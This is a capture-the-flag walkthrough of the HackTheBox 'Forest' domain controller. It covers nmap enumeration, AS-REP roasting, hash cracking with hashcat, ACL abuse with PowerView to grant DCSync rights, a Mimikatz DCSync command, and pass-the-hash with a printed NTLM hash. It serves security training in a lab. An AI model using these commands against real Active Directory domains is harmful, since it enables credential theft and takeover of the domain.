Forest is an easy box on the HacktheBox platform, featuring RID brute forcing, Kerberos AS-REProasting attacks, remote access using the WinRM protocol, privilege escalation through Active Directory ACL abuse, and finally DCSync attacks.
Enumeration
We start off with a nmap scan, using default scripts (-sC), and the enumerating versions flags (-sV).
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-12 08:29 CST
Nmap scan report for 10.10.10.161
Host is up (0.061s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-12 14:36:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-12-12T06:36:42-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h46m39s, deviation: 4h37m09s, median: 6m37s
| smb2-time:
| date: 2023-12-12T14:36:39
|_ start_date: 2023-12-11T01:44:33
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.32 seconds
By this nmap scan, we can see that that this machine is an Active Directory Domain Controller. We can attempt to enumerate Domain user accounts if SMB anonymous bindings are enabled. So we run enum4linux
.
We aquire quite a few users from enum4linux
, which we can use to leverage an attack.
Exploitation
We can build a wordlist of Domain usernames to test if accounts are ASREP-Roastable. An ASREPRoasting attack leverages an accounts lack of Kerberos pre-authentication required, giving us the users hash.
We can build the text file users.txt like so:
sebastien
lucinda
svc-alfresco
andy
mark
santi
zeus
and utilize it in an ASREPRoasting attack with impacket-GetNPUsers
:
We get a hash for the user svc-alfresco! The naming convention svc
indicates a service account, meaning potentially more privilege being given to this account.
We can then attempt to crack the hash using hashcat, with the command: hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
:
Boom! We cracked the service account hash! Great, now due to the WinRM service running on port 5985 that we enumerated earlier with nmap, we could potentially gain command execution if the service user is in the local group “Remote Management Users”.
We get command execution!
Privilege Escalation
As a Domain user, or a service account, I like to execute BloodHound on the target the enumerate potential domain vulnerabilities like Kerberoasting, or permission misconfiguration.
We find that the Domain Group Account Operators
as Generic All
access on zeus
, and svc-alfresco
is a part of the Privileged Accounts
Domain Group, and the Privileged Accounts
Domain Group is a member of the Account Operators
Group. Because of this, our current user has full control over the user zeus
. We can change their password, set them apart from the Remote Management Users
to get RCE, then give them DCSync rights.
net localgroup "Remote Management Users" htb.local\zeus /add
Utilize PowerView to give Zeus DCSync rights
. .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zeus', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity htb.local -PrincipalIdentity zeus -Rights DCSync
Then we can use Evil-WinRM once more to gain access to the zeus
account
We can then use Mimikatz to preform the DCSync procedure as zeus
.
Mimikatz.exe "lsadump::dcsync /domain:htb.local /user:Administrator" "exit"
And we’ve gathered the NTLM hash of the Administrator, we can use this to Pass the Hash (PtH) to the Domain Administrator with evil-winrm.
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6